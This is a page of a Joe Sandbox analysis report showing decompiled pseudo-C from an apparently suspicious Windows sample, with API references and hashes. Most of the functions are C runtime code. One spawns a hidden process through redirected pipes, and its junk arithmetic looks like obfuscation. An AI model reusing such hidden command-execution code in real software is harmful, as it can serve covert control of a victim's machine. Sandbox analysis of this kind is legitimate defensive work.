													E003AB701( &_v28,  &_v12);
													_v12 = _v28;
													_v8 = _v24;
												}
											}
											_t135 =  *0x3d12e0; // 0x0
											_t137 =  !(_t135 >> 1);
											__eflags = _t137 & 0x00000001;
											if((_t137 & 0x00000001) == 0) {
												E003AACC9( &_v12, E003AB80D(_t247,  &_v60));
											} else {
												_t183 = E003AB920(E003AB80D(_t247,  &_v52),  &_v60,  &_v12);
												_v12 =  *_t183;
												_v8 =  *((intOrPtr*)(_t183 + 4));
											}
											__eflags =  *_t291;
											if( *_t291 != 0) {
												E003AB920(E003AB4AB( &_v60, 0x28),  &_v36,  &_v12);
												_v28 = _v36;
												_v24 = _v32;
												E003AB968( &_v28, 0x29);
												_v12 = _v28;
												_v8 = _v24;
											}
											_t141 = E003AAB31(0x3d12b0, 8, 0);
											__eflags = _t141;
											if(_t141 == 0) {
												_t292 = 0;
												__eflags = 0;
											} else {
												 *(_t141 + 4) = 0;
												 *(_t141 + 4) =  *(_t141 + 4) & 0xffff00ff;
												 *_t141 = 0;
												_t292 = _t141;
											}
											E003AB3A2(_t285, _t288,  &_v44, _t292);
											_t145 = E003ABE5E(0x3d12b0, _t285,  &_v60);
											E003AB920(E003AB4AB( &_v52, 0x28),  &_v36, _t145);
											_v28 = _v36;
											_v24 = _v32;
											E003AB968( &_v28, 0x29);
											E003AB701( &_v12,  &_v28);
											_t154 =  *0x3d12e0; // 0x0
											__eflags = (_t154 & 0x00000060) - 0x60;
											if((_t154 & 0x00000060) != 0x60) {
												__eflags = _t288;
												if(_t288 != 0) {
													E003AB701( &_v12,  &_v20);
												}
											}
											_t156 =  *0x3d12e0; // 0x0
											_t158 =  !(_t156 >> 8);
											__eflags = _t158 & 0x00000001;
											_push( &_v60);
											if((_t158 & 0x00000001) == 0) {
												E003AACC9( &_v12, E003ABF3E());
											} else {
												E003AB701( &_v12, E003ABF3E());
											}
											__eflags = _t292;
											if(_t292 == 0) {
												E003AB0E6(_a4, 3);
												goto L49;
											} else {
												 *_t292 = _v12;
												 *((intOrPtr*)(_t292 + 4)) = _v8;
												_t163 = _a4;
												 *_t163 = _v44;
												_t163[1] = _v40;
											}
										} else {
											E003AB920(E003AB4D8( &_v36, "::"),  &_v28,  &_v12);
											_v12 = _v28;
											_v8 = _v24;
											_t207 =  *0x3d12d0; // 0x0
											__eflags =  *_t207;
											if( *_t207 == 0) {
												E003AB920(E003AB0E6( &_v60, 1),  &_v36,  &_v12);
												_v12 = _v36;
												_t213 = _v32;
											} else {
												_push( &_v52);
												_t227 = E003AE7BB(_t285);
												E003AB920(E003AB4AB( &_v60, 0x20),  &_v36, _t227);
												_v28 = _v36;
												_v24 = _v32;
												E003AB701( &_v28,  &_v12);
												_v12 = _v28;
												_t213 = _v24;
											}
											_v8 = _t213;
											_t214 =  *0x3d12d0; // 0x0
											_t215 =  *_t214;
											__eflags = _t215;
											if(_t215 == 0) {
												E003AB920(E003AB0E6( &_v60, 1), _a4,  &_v12);
												L49:
												_t163 = _a4;
											} else {
												__eflags = _t215 - 0x40;
												if(_t215 != 0x40) {
													_t163 = _a4;
													_t163[1] = _t163[1] & 0xffff00ff;
													 *_t163 =  *_t163 & 0x00000000;
													_t163[1] = 2;
												} else {
													_t219 =  *0x3d12e0; // 0x0
													 *0x3d12d0 =  *0x3d12d0 + 1;
													__eflags = (_t219 & 0x00000060) - 0x60;
													_push( &_v60);
													if((_t219 & 0x00000060) == 0x60) {
														_t222 = E003AB00B();
														_t247 =  &_v20;
														E003AACC9( &_v20, _t222);
													} else {
														_t224 = E003AB00B();
														_t247 =  *_t224;
														_v20 =  *_t224;
														_v16 = _t224[1];
													}
													goto L25;
												}
											}
										}
									} else {
										_t163 = _a4;
										_t163[1] = _t163[1] & 0xffff00ff;
										 *_t163 =  *_t163 & 0x00000000;
										_t163[1] = 2;
									}
								}
							}
							return _t163;
						} else {
							goto L4;
						}
					}
				} else {
					E003ABB9C(_t247, _a4, 1, _a8);
					return _a4;
				}
			}

0x003aea72
0x003aea72
0x003aea72
0x003aea77
0x003aea7c
0x003aea83
0x003aea9a
0x003aea9d
0x003aeaa4
0x003aeaa4
0x003aeaa7
0x00000000
0x003aeaa9
0x003aeaa9
0x003aeaac
0x003aeab3
0x003aeab3
0x003aeab6
0x003aeabb
0x003aeabb
0x003aea9f
0x003aea9f
0x003aeaa2
0x003aeabc
0x003aeac0
0x003aeac3
0x003aeac4
0x003aeac9
0x003aeacc
0x003aeb02
0x003aeb04
0x00000000
0x003aeb06
0x003aeb06
0x00000000
0x003aeb06
0x00000000
0x003aeace
0x003aeace
0x003aead0
0x003aead2
0x003aeaf2
0x003aeaf7
0x003aead4
0x003aead7
0x003aeadb
0x003aeae0
0x003aeae3
0x003aeb0b
0x003aeb0b
0x003aeb0b
0x003aeae5
0x003aeae5
0x003aeb09
0x003aeb09
0x00000000
0x00000000
0x003aeb09
0x003aeb0e
0x003aeb0e
0x003aeb11
0x003aeb29
0x003aeb2d
0x003aeb34
0x003aeb35
0x003aeb3a
0x003aeb3b
0x003aeb43
0x003aeb43
0x003aeb46
0x003aeb49
0x003aec27
0x003aec27
0x003aec2a
0x003aec30
0x003aec39
0x003aec3e
0x003aec3f
0x003aeccb
0x003aecd2
0x003aecd5
0x003aec45
0x003aec45
0x003aec5c
0x003aec64
0x003aec6a
0x003aec71
0x003aec74
0x003aec7c
0x003aec82
0x003aec82
0x003aec3f
0x003aecda
0x003aece1
0x003aece3
0x003aece5
0x003aed1b
0x003aece7
0x003aecfb
0x003aed05
0x003aed08
0x003aed08
0x003aed22
0x003aed24
0x003aed3a
0x003aed42
0x003aed4d
0x003aed50
0x003aed58
0x003aed5e
0x003aed5e
0x003aed69
0x003aed6e
0x003aed70
0x003aed82
0x003aed82
0x003aed72
0x003aed72
0x003aed75
0x003aed7c
0x003aed7e
0x003aed7e
0x003aed89
0x003aed92
0x003aedab
0x003aedb3
0x003aedbe
0x003aedc1
0x003aedcd
0x003aedd2
0x003aedda
0x003aeddc
0x003aedde
0x003aede0
0x003aede9
0x003aede9
0x003aede0
0x003aedee
0x003aedf6
0x003aedf8
0x003aedfd
0x003aedfe
0x003aee1b
0x003aee00
0x003aee0a
0x003aee0a
0x003aee20
0x003aee22
0x003aee44
0x00000000
0x003aee24
0x003aee27
0x003aee2c
0x003aee32
0x003aee35
0x003aee3a
0x003aee3a
0x003aeb4f
0x003aeb66
0x003aeb6e
0x003aeb74
0x003aeb77
0x003aeb7c
0x003aeb7f
0x003aebd8
0x003aebe0
0x003aebe3
0x003aeb81
0x003aeb84
0x003aeb85
0x003aeb9c
0x003aeba4
0x003aebaa
0x003aebb4
0x003aebbc
0x003aebbf
0x003aebbf
0x003aebe6
0x003aebe9
0x003aebee
0x003aebf0
0x003aebf2
0x003aecc1
0x003aee49
0x003aee49
0x003aebf8
0x003aebf8
0x003aebfa
0x003aec98
0x003aec9b
0x003aeca2
0x003aeca5
0x003aec00
0x003aec00
0x003aec05
0x003aec0e
0x003aec13
0x003aec14
0x003aec87
0x003aec8e
0x003aec91
0x003aec16
0x003aec16
0x003aec1c
0x003aec21
0x003aec24
0x003aec24
0x00000000
0x003aec14
0x003aebfa
0x003aebf2
0x003aeb13
0x003aeb13
0x003aeb16
0x003aeb1d
0x003aeb20
0x003aeb20
0x003aeb11
0x003aead2
0x003aee50
0x00000000
0x00000000
0x00000000
0x003aeaa2
0x003aea85
0x003aea8d
0x003aea99
0x003aea99

APIs

operator+.LIBCMT ref: 003AEA8D

Part of subcall function 003ABB9C: DName::DName.LIBCMT ref: 003ABBAF
Part of subcall function 003ABB9C: DName::operator+.LIBCMT ref: 003ABBB6

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: fa9a6290244a27ffd640a8d75683f7f5106f61229ec45d8f8cfeb1c9fad2a96b
Instruction ID: 409aa53a4a7f1e921792e08b072d993daef10847d4ef5d00a621fd4fb441c897
Opcode Fuzzy Hash: fa9a6290244a27ffd640a8d75683f7f5106f61229ec45d8f8cfeb1c9fad2a96b
Instruction Fuzzy Hash: 79D13075900209AFCB16DFA4D895EEEBBF8FF09310F14405AF541EB292DB359A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 003A01B5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E003A01B5(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t35;
				struct HINSTANCE__* _t36;
				intOrPtr* _t37;
				void* _t40;
				intOrPtr* _t42;
				void* _t43;

				_t35 = __edx;
				_t30 = __ebx;
				_t36 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t36 != 0) {
					 *0x3d1018 = GetProcAddress(_t36, "FlsAlloc");
					 *0x3d101c = GetProcAddress(_t36, "FlsGetValue");
					 *0x3d1020 = GetProcAddress(_t36, "FlsSetValue");
					_t7 = GetProcAddress(_t36, "FlsFree");
					__eflags =  *0x3d1018;
					_t40 = TlsSetValue;
					 *0x3d1024 = _t7;
					if( *0x3d1018 == 0) {
						L6:
						 *0x3d101c = TlsGetValue;
						 *0x3d1018 = E0039FE0E;
						 *0x3d1020 = _t40;
						 *0x3d1024 = TlsFree;
					} else {
						__eflags =  *0x3d101c;
						if( *0x3d101c == 0) {
							goto L6;
						} else {
							__eflags =  *0x3d1020;
							if( *0x3d1020 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x3ce994 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x3d101c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0039DCB7();
							_t42 = __imp__EncodePointer;
							_t14 =  *_t42( *0x3d1018);
							 *0x3d1018 = _t14;
							_t15 =  *_t42( *0x3d101c);
							 *0x3d101c = _t15;
							_t16 =  *_t42( *0x3d1020);
							 *0x3d1020 = _t16;
							 *0x3d1024 =  *_t42( *0x3d1024);
							_t18 = E003A2653();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0039FE88();
								goto L15;
							} else {
								_t37 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t37()))( *0x3d1018, E003A000C);
								 *0x3ce990 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E003B1B61(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t37()))( *0x3d1020,  *0x3ce990, _t43);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E0039FEC5(_t30, _t35, _t37, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0039FE88();
					return 0;
				}
			}

0x003a01b5
0x003a01b5
0x003a01c3
0x003a01c7
0x003a01e7
0x003a01f4
0x003a0201
0x003a0206
0x003a0208
0x003a020f
0x003a0215
0x003a021a
0x003a0232
0x003a0237
0x003a0241
0x003a024b
0x003a0251
0x003a021c
0x003a021c
0x003a0223
0x00000000
0x003a0225
0x003a0225
0x003a022c
0x00000000
0x003a022e
0x003a022e
0x003a0230
0x00000000
0x00000000
0x003a0230
0x003a022c
0x003a0223
0x003a0256
0x003a025c
0x003a0261
0x003a0264
0x003a032b
0x003a032b
0x003a032b
0x003a026a
0x003a0271
0x003a0273
0x003a0275
0x00000000
0x003a027b
0x003a027b
0x003a0286
0x003a028c
0x003a0294
0x003a0299
0x003a02a1
0x003a02a6
0x003a02ae
0x003a02b5
0x003a02ba
0x003a02bf
0x003a02c1
0x003a0326
0x003a0326
0x00000000
0x003a02c3
0x003a02c3
0x003a02d6
0x003a02d8
0x003a02dd
0x003a02e0
0x00000000
0x003a02e2
0x003a02ee
0x003a02f2
0x003a02f4
0x00000000
0x003a02f6
0x003a0307
0x003a0309
0x00000000
0x003a030b
0x003a030b
0x003a030d
0x003a030e
0x003a0315
0x003a031b
0x003a031f
0x003a0323
0x003a0323
0x003a0309
0x003a02f4
0x003a02e0
0x003a02c1
0x003a0275
0x003a032f
0x003a01c9
0x003a01c9
0x003a01d1
0x003a01d1

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0039E306), ref: 003A01BD
__mtterm.LIBCMT ref: 003A01C9

Part of subcall function 0039FE88: DecodePointer.KERNEL32(00000004,003A032B,?,0039E306), ref: 0039FE99
Part of subcall function 0039FE88: TlsFree.KERNEL32(00000002,003A032B,?,0039E306), ref: 0039FEB3
Part of subcall function 0039FE88: DeleteCriticalSection.KERNEL32(00000000,00000000,778DF3A0,?,003A032B,?,0039E306), ref: 003A26BA
Part of subcall function 0039FE88: _free.LIBCMT ref: 003A26BD
Part of subcall function 0039FE88: DeleteCriticalSection.KERNEL32(00000002,778DF3A0,?,003A032B,?,0039E306), ref: 003A26E4

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003A01DF
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003A01EC
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003A01F9
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003A0206
TlsAlloc.KERNEL32(?,0039E306), ref: 003A0256
TlsSetValue.KERNEL32(00000000,?,0039E306), ref: 003A0271
__init_pointers.LIBCMT ref: 003A027B
EncodePointer.KERNEL32(?,0039E306), ref: 003A028C
EncodePointer.KERNEL32(?,0039E306), ref: 003A0299
EncodePointer.KERNEL32(?,0039E306), ref: 003A02A6
EncodePointer.KERNEL32(?,0039E306), ref: 003A02B3
DecodePointer.KERNEL32(Function_0002000C,?,0039E306), ref: 003A02D4
__calloc_crt.LIBCMT ref: 003A02E9
DecodePointer.KERNEL32(00000000,?,0039E306), ref: 003A0303
GetCurrentThreadId.KERNEL32 ref: 003A0315

Strings

FlsFree, xrefs: 003A01FB
FlsGetValue, xrefs: 003A01E1
KERNEL32.DLL, xrefs: 003A01B8
FlsSetValue, xrefs: 003A01EE
FlsAlloc, xrefs: 003A01D9

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: dd92e7aa2d6c8065e1038c7f48a411237b9a978aff3e81a939353c4bd52773e6
Instruction ID: 4641fa93caa87c4be4e22d716175c02842385eb3ce62081ce49d4e0a2cc9f418
Opcode Fuzzy Hash: dd92e7aa2d6c8065e1038c7f48a411237b9a978aff3e81a939353c4bd52773e6
Instruction Fuzzy Hash: 83317C35D02350AFCB27BF75BC09B467BA8EB4A360F05452BE414D22B1DB389685DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00381000 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 244
pipeprocessfileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00381000(CHAR* _a4, CHAR* _a8, void* _a12, long _a16, intOrPtr _a20) {
				signed char _v8;
				void* _v12;
				signed int _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				struct _SECURITY_ATTRIBUTES _v44;
				struct _PROCESS_INFORMATION _v60;
				long long _v68;
				long _v72;
				struct _STARTUPINFOA _v140;
				signed char _t70;
				void* _t88;
				short _t93;
				int _t101;
				int _t115;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t126;
				intOrPtr _t130;
				intOrPtr _t132;
				intOrPtr _t137;
				intOrPtr _t141;
				short _t147;
				int _t150;
				signed int _t172;
				signed long long _t179;

				_v20 =  *0x3ce054 -  *0x3c7f80;
				_t70 =  *0x3ce44c; // 0x2575
				 *0x3ce44c =  *0x3ce44c + 1;
				_v8 = _t70;
				_v68 =  *0x3ce084 +  *0x3c7f7c;
				asm("fild dword [ebp-0x4]");
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				if((_t70 & 0x00000041) == 0) {
					 *0x3ce5a0 =  *0x3ce5a0 *  *0x3c7f78;
				}
				_t172 =  *0x3ce328 +  *0x3c7f70;
				_v44.lpSecurityDescriptor = 0;
				_v44.nLength = 0;
				asm("fcomp qword [0x3c7f68]");
				_v44.bInheritHandle = 0;
				_v44.lpSecurityDescriptor = 0;
				_t150 = 0;
				asm("fnstsw ax");
				_t115 = 0;
				_v44.nLength = 0xc;
				_v44.bInheritHandle = 1;
				if(0 == 0) {
					 *0x3ce180 =  *0x3ce180 - 1;
					_t147 =  *0x3ce598; // 0xc37b
					_v8 = _t147;
					asm("fild dword [ebp-0x4]");
					_v68 = _t172;
					_t132 =  *0x3ce180; // 0x7246
					_v20 =  *0x3ce3b8;
					_v8 = _t132;
					asm("fild dword [ebp-0x4]");
					asm("fsubr qword [ebp-0x40]");
					 *0x3ce598 = E0039CABC();
					_t172 =  *0x3ce3b8;
					asm("fld1");
					asm("fsubp st1, st0");
					 *0x3ce3b8 = _t172;
				}
				if(CreatePipe( &_v28,  &_v24,  &_v44, 0) == 0) {
					L17:
					E0038CB90(_a20, _t165);
				} else {
					SetHandleInformation(_v28, 1, 0);
					if(CreatePipe( &_v32,  &_v12,  &_v44, 0) != 0) {
						_t122 =  *0x3ce4f4; // 0x5f03
						_v8 = _t122;
						asm("fild dword [ebp-0x4]");
						_v20 = _t172;
						_t179 =  *0x3ce5c0 * _v20;
						 *0x3ce5c0 = _t179;
						SetHandleInformation(_v12, 1, 0);
						_t123 =  *0x3ce40c; // 0x42a5c331
						_v8 = _t123;
						asm("fild dword [ebp-0x4]");
						_v20 = _t179;
						_t137 =  *0x3ce00c; // 0x640f69c6
						_v8 = _t137;
						asm("fild dword [ebp-0x4]");
						asm("fsubp st1, st0");
						asm("fsubr qword [ebp-0x10]");
						 *0x3ce40c = E0039CABC();
						 *0x3ce00c =  *0x3ce00c - 1;
						_v60.hProcess = 0;
						_v60.hThread = 0;
						_v60.dwProcessId = 0;
						_v60.dwThreadId = 0;
						E0039C990( &_v140, 0, 0x44);
						_t88 = _v24;
						_v140.dwFlags = _v140.dwFlags | 0x00000101;
						_v140.hStdError = _t88;
						_v140.hStdOutput = _t88;
						_v140.hStdInput = _v32;
						_v140.wShowWindow = 0;
						_v140.cb = 0x44;
						if(CreateProcessA(0, _a4, 0, 0, 1, 0, 0, _a8,  &_v140,  &_v60) == 0) {
							L12:
							CloseHandle(_v12);
						} else {
							_t101 = WriteFile(_v12, _a12, _a16,  &_v72, 0);
							_t161 = _t101;
							if(_t101 == 0) {
								goto L12;
							} else {
								CloseHandle(_v12);
								CloseHandle(_v24);
								 *0x3ce60c =  *0x3ce60c -  *0x3c7f50;
								_t115 = 1;
								E0038B9C0(_t161,  *0x3ce60c -  *0x3c7f50, _v28, _a20);
								WaitForSingleObject(_v60.hProcess, 0x2710);
								_t130 =  *0x3ce1f8; // 0x3e6
								if(_t130 + 0x40adce15 > 0xb96f9644) {
									 *0x3ce4f0 = E0039CABC();
								} else {
									 *0x3ce328 = 0x69400000;
									 *0x3ce32c = 0xc1da316e;
								}
								CloseHandle(_v60);
								CloseHandle(_v60.hThread);
								_t150 = _t115;
							}
						}
						_t93 =  *0x3ce598; // 0xc37b
						_t126 =  *0x3ce24c; // 0x2b07f8d9
						_t141 =  *0x3ce5b4; // 0x1cd4718b
						 *0x3ce598 = _t93 - _t126 - _t141 + 0x5442358a;
						 *0x3ce5b4 =  *0x3ce5b4 + 1;
						 *0x3ce24c =  *0x3ce24c - 1;
						CloseHandle(_v32);
					}
					CloseHandle(_v28);
					if(_t115 == 0) {
						CloseHandle(_v24);
					}
					_v20 =  *0x3ce60c +  *0x3c7f4c;
					 *0x3ce184 =  *0x3ce184 + _v20;
					asm("fld1");
					asm("fsubp st1, st0");
					_t165 = _t150;
					if(_t150 == 0) {
						goto L17;
					}
				}
				return _t150;
			}

0x00381015
0x0038101e
0x0038102a
0x00381034
0x00381037
0x0038103a
0x00381040
0x00381043
0x00381048
0x00381056
0x00381056
0x00381064
0x0038106a
0x0038106e
0x00381071
0x00381077
0x0038107a
0x0038107e
0x00381080
0x00381082
0x00381084
0x0038108b
0x00381095
0x00381097
0x0038109e
0x003810a8
0x003810ab
0x003810ae
0x003810b7
0x003810c1
0x003810c4
0x003810c7
0x003810d3
0x003810db
0x003810e1
0x003810e7
0x003810e9
0x003810eb
0x003810eb
0x00381107
0x00381362
0x00381365
0x0038110d
0x00381115
0x00381131
0x00381137
0x00381141
0x00381148
0x0038114b
0x00381157
0x0038115b
0x00381161
0x00381167
0x0038116d
0x00381170
0x00381173
0x0038117c
0x00381182
0x00381185
0x00381188
0x00381190
0x00381198
0x0038119d
0x003811a8
0x003811ab
0x003811ae
0x003811b1
0x003811bb
0x003811c0
0x003811c6
0x003811d0
0x003811d3
0x003811df
0x003811e9
0x003811fe
0x00381210
0x003812d6
0x003812da
0x00381216
0x00381228
0x0038122e
0x00381230
0x00000000
0x00381236
0x0038123a
0x00381244
0x0038125d
0x00381264
0x00381269
0x0038127a
0x00381280
0x00381296
0x003812b9
0x00381298
0x00381298
0x003812a2
0x003812a2
0x003812c2
0x003812cc
0x003812d2
0x003812d2
0x00381230
0x003812e0
0x003812e6
0x003812ec
0x003812fc
0x00381302
0x00381308
0x00381312
0x00381312
0x0038131c
0x00381324
0x0038132a
0x0038132a
0x0038133c
0x00381348
0x00381354
0x00381356
0x0038135e
0x00381360
0x00000000
0x00000000
0x00381360
0x00381371

APIs

CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003810FF
SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00381115
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00381129
SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00381161
_memset.LIBCMT ref: 003811BB
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,?,?,?), ref: 00381208
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00381228
CloseHandle.KERNEL32(?), ref: 0038123A
CloseHandle.KERNEL32(?), ref: 00381244

Part of subcall function 0038B9C0: ReadFile.KERNEL32(?,?,00005000,?,00000000,?,00000000,?,0038126E,?,?), ref: 0038BA11
Part of subcall function 0038B9C0: ReadFile.KERNEL32(?,?,00005000,?,00000000,?,?,?,00000000,?,0038126E,?,?), ref: 0038BA49

WaitForSingleObject.KERNEL32(?,00002710), ref: 0038127A
CloseHandle.KERNEL32(?), ref: 003812C2
CloseHandle.KERNEL32(?), ref: 003812CC
CloseHandle.KERNEL32(?), ref: 003812DA
CloseHandle.KERNEL32(?), ref: 00381312
CloseHandle.KERNEL32(?), ref: 0038131C
CloseHandle.KERNEL32(?), ref: 0038132A

Strings

D, xrefs: 003811FE

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Handle$Close$CreateFile$InformationPipeRead$ObjectProcessSingleWaitWrite_memset
String ID: D
API String ID: 891997808-2746444292
Opcode ID: c2d53acc3a31050c497e915ada93aee9532625a68cdf9dbcfe71353c6be28abc
Instruction ID: 9af54991ca70cbef7a609cd2d0a851c2984a73584fbc19e7077aad4a80e996cb
Opcode Fuzzy Hash: c2d53acc3a31050c497e915ada93aee9532625a68cdf9dbcfe71353c6be28abc
Instruction Fuzzy Hash: 46A16B75A00219EBDB06DFA1ED88FEEBB7CFB48700F118459E941E2294DB34A961CF54

Uniqueness

Uniqueness Score: -1.00%

Function 003B6C63 Relevance: 24.1, APIs: 16, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E003B6C63(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t42;
				intOrPtr* _t50;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t50 = E003B1B61(8, 1);
					_t56 = _t50;
					if(_t50 != 0) {
						_t13 = E003B1B61(0xd8, 1);
						 *_t50 = _t13;
						__eflags = _t13;
						if(_t13 != 0) {
							_t14 = E003B1B61(0x220, 1);
							 *((intOrPtr*)(_t50 + 4)) = _t14;
							__eflags = _t14;
							if(_t14 != 0) {
								E003B5F8B( *_t50, 0x3cf420);
								_t47 =  *_t50;
								_t17 = E003B6A47(_a4,  *_t50, _a8);
								_pop(_t42);
								__eflags = _t17;
								if(__eflags != 0) {
									_t19 = E003B02F0(_t42, _t47, __eflags,  *((intOrPtr*)( *_t50 + 4)),  *((intOrPtr*)(_t50 + 4)));
									__eflags = _t19;
									if(_t19 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										L17:
										return _t50;
									}
									E0039CB4B( *((intOrPtr*)(_t50 + 4)));
									E003B075E( *_t50);
									E003B07F7( *_t50);
									E0039CB4B(_t50);
									L15:
									_t50 = 0;
									goto L17;
								}
								E003B075E( *_t50);
								E003B07F7( *_t50);
								E0039CB4B(_t50);
								goto L15;
							}
							E0039CB4B( *_t50);
							E0039CB4B(_t50);
							L8:
							goto L3;
						}
						E0039CB4B(_t50);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E0039FA66(_t56))) = 0xc;
					goto L4;
				}
			}

0x003b6c6e
0x003b6c94
0x00000000
0x003b6c76
0x003b6c81
0x003b6c85
0x003b6c87
0x003b6ca0
0x003b6ca7
0x003b6ca9
0x003b6cab
0x003b6cbc
0x003b6cc3
0x003b6cc6
0x003b6cc8
0x003b6ce1
0x003b6cec
0x003b6cee
0x003b6cf3
0x003b6cf4
0x003b6cf6
0x003b6d19
0x003b6d20
0x003b6d22
0x003b6d4a
0x003b6d4f
0x003b6d51
0x00000000
0x003b6d51
0x003b6d27
0x003b6d2e
0x003b6d35
0x003b6d3b
0x003b6d43
0x003b6d43
0x00000000
0x003b6d43
0x003b6cfa
0x003b6d01
0x003b6d07
0x00000000
0x003b6d0c
0x003b6ccc
0x003b6cd2
0x003b6cb3
0x00000000
0x003b6cb3
0x003b6cae
0x00000000
0x003b6cae
0x003b6c89
0x003b6c8e
0x00000000
0x003b6c8e

APIs

__calloc_crt.LIBCMT ref: 003B6C7C

Part of subcall function 003B1B61: Sleep.KERNEL32(00000000), ref: 003B1B89

__calloc_crt.LIBCMT ref: 003B6CA0
_free.LIBCMT ref: 003B6CAE
__calloc_crt.LIBCMT ref: 003B6CBC
_free.LIBCMT ref: 003B6CCC
_free.LIBCMT ref: 003B6CD2
__copytlocinfo_nolock.LIBCMT ref: 003B6CE1
__setlocale_nolock.LIBCMT ref: 003B6CEE
___removelocaleref.LIBCMT ref: 003B6CFA
___freetlocinfo.LIBCMT ref: 003B6D01
_free.LIBCMT ref: 003B6D07
__setmbcp_nolock.LIBCMT ref: 003B6D19
_free.LIBCMT ref: 003B6D27
___removelocaleref.LIBCMT ref: 003B6D2E
___freetlocinfo.LIBCMT ref: 003B6D35
_free.LIBCMT ref: 003B6D3B

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
